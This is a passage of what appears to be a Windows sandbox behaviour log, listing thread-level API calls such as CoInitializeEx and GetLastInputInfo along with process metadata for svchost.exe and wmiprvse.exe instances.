[4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnk=0x1f83e66c, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0) returned 0x0 Thread: id = 81 os_tid = 0xa70 [0300.251] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0320.614] CoUninitialize () Thread: id = 82 os_tid = 0xa80 [0300.631] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0303.537] CoUninitialize () Thread: id = 83 os_tid = 0xa90 [0302.946] CoGetContextToken (in: pToken=0x225cf600 | out: pToken=0x225cf600) returned 0x0 [0302.946] IUnknown:QueryInterface (in: This=0x742030, riid=0x734c3ff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x225cf634 | out: ppvObject=0x225cf634*=0x74203c) returned 0x0 [0302.947] IComThreadingInfo:GetCurrentThreadType (in: This=0x74203c, pThreadType=0x225cf668 | out: pThreadType=0x225cf668*=0) returned 0x0 [0302.947] IUnknown:Release (This=0x74203c) returned 0x1 [0302.948] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 Thread: id = 84 os_tid = 0xab0 [0304.584] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0305.716] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22aaf4b0 | out: lpSystemTimeAsFileTime=0x22aaf4b0*(dwLowDateTime=0xd044bda0, dwHighDateTime=0x1d5ca09)) [0317.995] GetLastInputInfo (in: plii=0x2018518c | out: plii=0x2018518c) returned 1 [0318.190] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22aaf4b0 | out: lpSystemTimeAsFileTime=0x22aaf4b0*(dwLowDateTime=0xd7987920, dwHighDateTime=0x1d5ca09)) [0318.191] GetLastInputInfo (in: plii=0x2018518c | out: plii=0x2018518c) returned 1 [0318.215] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22aaf4b0 | out: lpSystemTimeAsFileTime=0x22aaf4b0*(dwLowDateTime=0xd79ada80, dwHighDateTime=0x1d5ca09)) [0318.215] GetLastInputInfo (in: plii=0x2018518c | out: plii=0x2018518c) returned 1 [0318.373] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22aaf4b0 | out: lpSystemTimeAsFileTime=0x22aaf4b0*(dwLowDateTime=0xd7b2a840, dwHighDateTime=0x1d5ca09)) [0318.373] GetLastInputInfo (in: plii=0x2018518c | out: plii=0x2018518c) returned 1 Thread: id = 85 os_tid = 0xac0 Thread: id = 86 os_tid = 0xad0 [0308.143] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0308.310] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22eaf010 | out: lpSystemTimeAsFileTime=0x22eaf010*(dwLowDateTime=0xd1c65c60, dwHighDateTime=0x1d5ca09)) [0317.655] GetLastInputInfo (in: plii=0x2018518c | out: plii=0x2018518c) returned 1 [0317.887] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22eaf010 | out: lpSystemTimeAsFileTime=0x22eaf010*(dwLowDateTime=0xd768dda0, dwHighDateTime=0x1d5ca09)) [0317.897] GetLastInputInfo (in: plii=0x2018518c | out: plii=0x2018518c) returned 1 [0318.557] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22eaf010 | out: lpSystemTimeAsFileTime=0x22eaf010*(dwLowDateTime=0xd7cf38c0, dwHighDateTime=0x1d5ca09)) [0318.557] GetLastInputInfo (in: plii=0x2018518c | out: plii=0x2018518c) returned 1 [0318.709] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22eaf010 | out: lpSystemTimeAsFileTime=0x22eaf010*(dwLowDateTime=0xd7e70680, dwHighDateTime=0x1d5ca09)) [0318.709] GetLastInputInfo (in: plii=0x2018518c | out: plii=0x2018518c) returned 1 [0320.691] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22eaf010 | out: lpSystemTimeAsFileTime=0x22eaf010*(dwLowDateTime=0xd9155520, dwHighDateTime=0x1d5ca09)) [0320.692] GetLastInputInfo (in: plii=0x2018518c | out: plii=0x2018518c) returned 1 Thread: id = 87 os_tid = 0xae0 [0311.436] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0311.844] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2241efa0 | out: lpSystemTimeAsFileTime=0x2241efa0*(dwLowDateTime=0xd3e05320, dwHighDateTime=0x1d5ca09)) [0317.913] GetLastInputInfo (in: plii=0x2018518c | out: plii=0x2018518c) returned 1 [0317.937] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2241efa0 | out: lpSystemTimeAsFileTime=0x2241efa0*(dwLowDateTime=0xd77001c0, dwHighDateTime=0x1d5ca09)) [0317.938] GetLastInputInfo (in: plii=0x2018518c | out: plii=0x2018518c) returned 1 [0317.952] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2241efa0 | out: lpSystemTimeAsFileTime=0x2241efa0*(dwLowDateTime=0xd7726320, dwHighDateTime=0x1d5ca09)) [0317.953] GetLastInputInfo (in: plii=0x2018518c | out: plii=0x2018518c) returned 1 Thread: id = 88 os_tid = 0xaf0 [0316.396] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0316.615] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22daf450 | out: lpSystemTimeAsFileTime=0x22daf450*(dwLowDateTime=0xd6aa6fa0, dwHighDateTime=0x1d5ca09)) [0318.079] GetLastInputInfo (in: plii=0x2018518c | out: plii=0x2018518c) returned 1 [0318.465] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22daf450 | out: lpSystemTimeAsFileTime=0x22daf450*(dwLowDateTime=0xd7c0f080, dwHighDateTime=0x1d5ca09)) [0318.465] GetLastInputInfo (in: plii=0x2018518c | out: plii=0x2018518c) returned 1 [0319.517] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22daf450 | out: lpSystemTimeAsFileTime=0x22daf450*(dwLowDateTime=0xd862ce00, dwHighDateTime=0x1d5ca09)) [0319.518] GetLastInputInfo (in: plii=0x2018518c | out: plii=0x2018518c) returned 1 [0321.762] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22daf450 | out: lpSystemTimeAsFileTime=0x22daf450*(dwLowDateTime=0xd9b99400, dwHighDateTime=0x1d5ca09)) [0321.763] GetLastInputInfo (in: plii=0x2018518c | out: plii=0x2018518c) returned 1 Process: id = "4" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x9014000" os_pid = "0x3f8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "3" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000db03" [0xc000000f], "LOCAL" [0x7] Thread: id = 10 os_tid = 0x810 Thread: id = 11 os_tid = 0x7f0 Thread: id = 12 os_tid = 0x7c0 Thread: id = 13 os_tid = 0x7c8 Thread: id = 14 os_tid = 0x6cc Thread: id = 15 os_tid = 0x644 Thread: id = 16 os_tid = 0x63c Thread: id = 17 os_tid = 0x154 Thread: id = 18 os_tid = 0x150 Thread: id = 19 os_tid = 0x120 Thread: id = 20 os_tid = 0x118 Thread: id = 21 os_tid = 0x3fc Thread: id = 70 os_tid = 0x92c Process: id = "5" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x8f04000" os_pid = "0x370" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "3" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000cc7d" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 28 os_tid = 0x6dc Thread: id = 29 os_tid = 0xbd8 Thread: id = 30 os_tid = 0x318 Thread: id = 31 os_tid = 0x638 Thread: id = 32 os_tid = 0x25c Thread: id = 33 os_tid = 0x794 Thread: id = 34 os_tid = 0x7a4 Thread: id = 35 os_tid = 0x6d0 Thread: id = 36 os_tid = 0x344 Thread: id = 37 os_tid = 0x7e8 Thread: id = 38 os_tid = 0x11c Thread: id = 39 os_tid = 0x41c Thread: id = 40 os_tid = 0x618 Thread: id = 41 os_tid = 0x5fc Thread: id = 42 os_tid = 0x5f4 Thread: id = 43 os_tid = 0x5d0 Thread: id = 44 os_tid = 0x5c0 Thread: id = 45 os_tid = 0x59c Thread: id = 46 os_tid = 0x45c Thread: id = 47 os_tid = 0x43c Thread: id = 48 os_tid = 0x414 Thread: id = 49 os_tid = 0x410 Thread: id = 50 os_tid = 0xf0 Thread: id = 51 os_tid = 0xc8 Thread: id = 52 os_tid = 0x3f4 Thread: id = 53 os_tid = 0x3e8 Thread: id = 54 os_tid = 0x39c Thread: id = 55 os_tid = 0x390 Thread: id = 56 os_tid = 0x37c Thread: id = 57 os_tid = 0x374 Thread: id = 58 os_tid = 0x84c Thread: id = 59 os_tid = 0x85c Thread: id = 60 os_tid = 0x86c Thread: id = 61 os_tid = 0x87c Thread: id = 75 os_tid = 0x9ac Thread: id = 76 os_tid = 0x9bc Thread: id = 77 os_tid = 0x9cc Thread: id = 78 os_tid = 0x9dc Thread: id = 79 os_tid = 0x9ec Thread: id = 80 os_tid = 0x9fc Process: id = "6" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x30e2a000" os_pid = "0x88c" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "5" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:00074b3a" [0xc000000f] Thread: id = 62 os_tid = 0x90c Thread: id = 63 os_tid = 0x8fc Thread: id = 64 os_tid = 0x8ec Thread: id = 65 os_tid = 0x8dc Thread: id = 66 os_tid = 0x8cc Thread: id = 67 os_tid = 0x8ac Thread: id = 68 os_tid = 0x89c Thread: id = 69 os_tid = 0x91c Thread: id = 89 os_tid = 0xb00